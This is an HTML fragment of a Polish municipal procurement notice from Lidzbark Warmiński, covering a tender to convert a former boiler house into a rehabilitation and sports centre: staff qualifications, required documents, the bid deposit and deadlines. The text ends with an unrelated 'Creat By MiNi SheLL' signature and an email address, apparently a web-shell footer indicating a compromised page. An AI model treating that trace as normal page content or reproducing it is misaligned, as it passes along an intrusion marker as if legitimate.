budynku<br/>użyteczności publicznej wraz z instalacjami o powierzchni użytkowej minimalnej 400 m2 każda robota o wartości<br/>nie mniejszej niż 1 500 000,00 złotych brutto (słownie: jeden milion pięćset tysięcy złotych brutto).<br/> b) Zamawiający żąda od<br/>Wykonawcy wskazania osób, które będą uczestniczyć w wykonywaniu zamówienia, legitymujących się kwalifikacjami<br/>zawodowymi i doświadczeniem odpowiednim do funkcji, jakie zostaną im powierzone. Wykonawca na każdą funkcję<br/>wymienioną poniżej, wskaże osoby, które musi mieć dostępne na etapie realizacji zamówienia, spełniające następujące<br/>wymagania:<br/>b 1) na etapie projektowania (wykonanie dokumentacji projektowej):<br/>b 1.1) Wykonawca skieruje do realizacji zamówienia minimum 1 osobę - projektanta dokumentacji projektowej branży<br/>konstrukcyjno-budowlanej, koordynatora zespołu projektowego, legitymującego się posiadaniem uprawnień budowlanych do<br/>projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń, wydane na podstawie aktualnych przepisów<br/>ustawy Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów. b 1.2) Wykonawca skieruje do realizacji zamówienia minimum 1 osobę - projektanta dokumentacji projektowej branży<br/>sanitarnej, legitymującego się posiadaniem uprawnień budowlanych do projektowania w specjalności instalacyjnej w<br/>zakresie sieci, instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,<br/>wydane na podstawie aktualnych przepisów ustawy Prawo budowlane lub odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>b 1.3) Wykonawca skieruje do realizacji zamówienia minimum 1 osobę - projektanta dokumentacji projektowej branży<br/>elektrycznej i elektroenergetycznej legitymującego się posiadaniem uprawnień budowlanych do projektowania w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: elektrycznych i elektroenergetycznych bez ograniczeń,<br/>wydane na podstawie aktualnych przepisów ustawy Prawo budowlane lub odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. b 2) na etapie realizacji robót<br/>budowlanych: b 2.1) Wykonawca skieruje do realizacji zamówienia minimum 1 osobę, która będzie pełnić funkcję kierownika<br/>budowy specjalności konstrukcyjno - budowlanej - posiadającą uprawnienia budowlane do kierowania robotami<br/>budowlanymi w<br/>specjalności konstrukcyjno - budowlanej bez ograniczeń, wydane na podstawie aktualnych przepisów ustawy Prawo<br/>budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów. b 2.2) Wykonawca skieruje do realizacji zamówienia minimum 1 osobę, która będzie pełnić<br/>funkcję kierownika robót branży sanitarnej- posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych bez ograniczeń, wydane na podstawie aktualnych przepisów ustawy Prawo budowlane lub odpowiadające<br/>im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>b 2. 3) Wykonawca skieruje do realizacji zamówienia minimum 1 osobę, która będzie pełnić funkcję kierownika robót branży<br/>elektrycznej i elektroenergetycznej, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: elektrycznych i elektroenergetycznych bez ograniczeń,<br/>wydane na podstawie aktualnych przepisów ustawy Prawo budowlane lub odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 3. Zamawiający dopuszcza łączenie<br/>kilku funkcji przez jedną osobę w przypadku posiadania przez nią kilku wymaganych uprawnień.<br/>4. Zamawiający oceniając zdolność techniczną lub zawodową może, na każdym etapie postępowania, uznać, że<br/>Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze<br/>Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>5. Osoby, o których mowa w ust. 2 pkt 4 lit. b i które uzyskały kwalifikacje do wykonywania samodzielnych funkcji<br/>technicznych w Rzeczypospolitej Polskiej, muszą być wpisane na listę członków właściwej izby samorządu zawodowego i<br/>ubezpieczone od odpowiedzialności cywilnej, co daje im prawo wykonywania samodzielnych funkcji technicznych w<br/>budownictwie, zgodnie z ustawą z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa<br/>(t.j. Dz.U. z 2019 r., poz. 1117). Uprawnienia budowlane wydane na podstawie aktualnych przepisów, powinny być zgodne z<br/>ustawą z dnia 7 lipca 1994 r. – Prawo budowlane (t.j. Dz. U. z 2021r., poz. 2351 ze zm.).<br/>Oprócz osób, o których mowa wyżej, w wykonaniu zamówienia mogą wziąć udział również osoby, będące obywatelami<br/>innych niż Rzeczpospolita Polska państw członkowskich Unii Europejskiej, państw członkowskich Europejskiego<br/>Porozumienia o Wolnym Handlu (EFTA) oraz Konfederacji Szwajcarskiej, zwanych dalej „państwami członkowskimi”,<br/>spełniający wymagania zawarte w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2021 r., poz. 2351 ze zm.), a<br/>w szczególności w art. 12a oraz w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r., poz. 220).<br/>Zamawiający zaakceptuje uprawnienia budowlane odpowiadające wymaganym uprawnieniom, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw<br/>Europejskiego Porozumienia o Wolnym Handlu (EFTA) oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz<br/>innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r., poz. 220). Na podstawie art. 104<br/>ustawy Prawo budowlane, osoby, które przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub<br/>stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie,<br/>zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.<br/>Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące<br/>podstawą ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w<br/>budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie<br/>kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.<br/>6. Wymienione w ust. 2 pkt 4 lit. b osoby nie wyczerpują wymagań dla rzetelnego wypełnienia zobowiązań Wykonawcy i<br/>powinny być traktowane jako minimalne wymagania Zamawiającego... CIĄG DALSZY W ROZDZIALE VII SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3.3.W celu potwierdzenia<br/>braku podstaw wykluczenia wykonawcy z udziału w postępowaniu, Zamawiający żąda następujących podmiotowych środków<br/>dowodowych:<br/>3.3.1 oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – stanowiącego załącznik nr 9 do SWZ;<br/>3.3.2 odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>3.3.3 oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp w zakresie<br/>odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 3-6 Pzp , w art. 109 ust. 1 pkt 7 Pzp oraz w art. 7 ust.1<br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego – stanowiący załącznik nr 10 do SWZ.4. Jeżeli Wykonawca ma siedzibę lub<br/>miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast:<br/>1) dokumentu, o którym mowa w pkt 3.3.2 - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę<br/>lub miejsce zamieszkania, potwierdzające odpowiednio, że:<br/>a) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury... CIĄG DALSZY ZNAJDUJE SIĘ W ROZDZIALE<br/>IX SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.1.W<br/>celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub<br/>finansowej, Zamawiający żąda następujących dokumentów:<br/>3.1.1 informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>3.1.2 potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego;<br/>3.1.3 Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej<br/>wymaganych przez zamawiającego, może złożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego<br/>przez Zamawiającego warunku udziału w postępowaniu. 3.2.W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału<br/>w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda następujących dokumentów.<br/>3.2.1 wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty;<br/>3.2.2 wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca może złożyć tylko jedną ofertę. Złożenie większej liczby ofert lub oferty zawierającej propozycje wariantowe<br/>spowoduje, że oferta będzie podlegać odrzuceniu.<br/>2. Treść oferty musi odpowiadać treści SWZ.<br/>3. Ofertę sporządza się w języku polskim na Formularzu Ofertowym – zgodnie z załącznikiem nr 1 do SWZ.<br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, wzór oświadczeń stanowi:<br/>- załącznik nr 2A do SWZ;<br/>- załącznik nr 2B do SWZ - jeżeli dotyczy;<br/>2) zobowiązanie innego podmiotu, o którym mowa w Rozdziale X ust. 3 SWZ, wzór oświadczenia stanowi załącznik nr 3 do<br/>SWZ - jeżeli dotyczy;<br/>3) dowód wniesienia wadium (w przypadku wadium złożonego w formie poręczeń lub gwarancji);<br/>4) dokumenty, z których wynika prawo do podpisania oferty. W celu potwierdzenia, że osoba działająca w imieniu<br/>Wykonawcy jest umocowana do jego reprezentowania, Zamawiający żąda od Wykonawcy odpisu lub informacji z<br/>Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru, chyba, że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, a Wykonawca w<br/>formularzu oferty wskazał dane (tj.nr KRS, nr NIP lub REGON) umożliwiające dostęp do tych dokumentów, w odniesieniu do<br/>Wykonawcy jak również do podmiotów udostępniających zasoby.; 5) odpowiednie pełnomocnictwa (jeżeli dotyczy);<br/>- pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub podmiotu<br/>udostępniającego zasoby chyba, że umocowanie do reprezentacji wynika z dokumentów, o których mowa w pkt 5 powyżej;<br/>- pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (np. umowa o współdziałaniu). Pełnomocnik może być ustanowiony do<br/>reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy;<br/>6) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na podstawie art. 117 ust. 4<br/>ustawy Pzp – stanowiące załącznik nr 6 do SWZ (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 25 000,00 złotych (słownie:<br/>dwadzieścia pięć tysięcy złotych);<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na rachunek bankowy Urzędu Miejskiego w Lidzbarku Warmińskim<br/>w Banku Millennium S.A. Nr 13116022020000000061931481, z dopiskiem: Wadium – „Przebudowa budynku po byłej<br/>kotłowni oraz terenu przylegającego na potrzeby centrum rehabilitacji i aktywności sportowej przy ul. Leśnej w Lidzbarku<br/>Warmińskim”<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. 5.<br/>Wadium wnoszone w formie poręczeń lub gwarancji musi spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w<br/>Pzp, bez potwierdzania tych okoliczności;<br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż<br/>pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Gmina Miejska Lidzbark Warmiński;<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Pzp), Zamawiający wymaga aby<br/>poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>8) jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt. 2-4 , wykonawca<br/>przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>6. W przypadku wniesienia wadium w formie:<br/>1) pieniężnej - zaleca się, by dowód dokonania przelewu został dołączony do oferty;<br/>2) poręczeń lub gwarancji - wymaga się, by oryginał dokumentu został złożony wraz z ofertą.<br/>7. Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie<br/>do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3<br/>Pzp zostanie odrzucona.<br/>8. Zasady zwrotu oraz okoliczności zatrzymania wadium określa Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o zamówienie, są zobowiązani do ustanowienia pełnomocnika do reprezentowania<br/>ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego<br/>zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty w postaci elektronicznej.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>4. W przypadku wykonawców składających ofertę wspólną, wymagane doświadczenie zawodowe powinien mieć co<br/>najmniej jeden z wykonawców składających ofertę wspólną, tj.: warunek ten ma spełniać samodzielnie Wykonawca lub<br/>samodzielnie jeden z konsorcjantów lub samodzielnie jeden podmiot udostępniający zasoby wiedzy i doświadczenia.<br/>Doświadczenie ww. podmiotów nie sumuje się.<br/>5. Zamawiający dopuszcza łączenie potencjału finansowego wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>6. W przypadku, o którym mowa w ust. 3, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy- wzór<br/>oświadczenia stanowi załącznik nr 6 do SWZ.<br/>7. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zawarte są w projektowanych postanowieniach umowy<br/>stanowiących Załącznik nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami składa się poprzez Platformę Przetargową Gminy Miejskiej Lidzbark Warmiński dostępnej pod adresem: https://platformazakupowa.pl/pn/lidzbarkw</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, z postępowania o udzielenie zamówienia wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy. (więcej rozdział VIII SWZ).<br/>Zadanie realizowane w ramach dofinansowania z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych- „Edycja Czwarta – Polskie Uzdrowiska”

Creat By MiNi SheLL
Email: jattceo@gmail.com